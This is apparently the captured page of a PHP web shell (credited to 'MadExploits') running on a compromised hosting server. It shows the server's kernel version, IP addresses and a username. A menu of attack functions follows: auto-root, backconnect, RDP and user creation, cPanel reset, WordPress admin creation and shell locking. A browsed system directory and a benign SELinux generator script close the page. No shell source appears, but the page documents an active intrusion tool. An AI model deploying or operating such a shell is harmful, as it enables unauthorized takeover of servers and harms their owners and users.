Linux premium180.web-hosting.com 4.18.0-553.54.1.lve.el8.x86_64 #1 SMP Wed Jun 4 13:01:13 UTC 2025 x86_64
LiteSpeed
: 162.0.209.168 | : 216.73.216.187
Cant Read [ /etc/named.conf ]
8.3.30
nortrmdp
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
lib /
systemd /
system-generators /
[ HOME SHELL ]
Name
Size
Permission
Action
kdump-dep-generator.sh
537
B
-rwxr-xr-x
nfs-server-generator
66.03
KB
-rwxr-xr-x
rpc-pipefs-generator
37.19
KB
-rwxr-xr-x
selinux-autorelabel-generator....
743
B
-rwxr-xr-x
systemd-cryptsetup-generator
32.87
KB
-rwxr-xr-x
systemd-debug-generator
16.45
KB
-rwxr-xr-x
systemd-fstab-generator
45.1
KB
-rwxr-xr-x
systemd-getty-generator
16.77
KB
-rwxr-xr-x
systemd-gpt-auto-generator
28.87
KB
-rwxr-xr-x
systemd-hibernate-resume-gener...
12.45
KB
-rwxr-xr-x
systemd-rc-local-generator
12.29
KB
-rwxr-xr-x
systemd-system-update-generato...
12.34
KB
-rwxr-xr-x
systemd-sysv-generator
32.89
KB
-rwxr-xr-x
systemd-veritysetup-generator
20.74
KB
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : selinux-autorelabel-generator.sh
#!/bin/sh # This systemd.generator(7) detects if SELinux is running and if the # user requested an autorelabel, and if so sets the default target to # selinux-autorelabel.target, which will cause the filesystem to be # relabelled and then the system will reboot again and boot into the # real default target. PATH=/usr/sbin:$PATH unitdir=/usr/lib/systemd/system # If invoked with no arguments (for testing) write to /tmp. earlydir="/tmp" if [ -n "$2" ]; then earlydir="$2" fi set_target () { ln -sf "$unitdir/selinux-autorelabel.target" "$earlydir/default.target" } if selinuxenabled; then if test -f /.autorelabel; then set_target elif grep -sqE "\bautorelabel\b" /proc/cmdline; then set_target fi fi
Close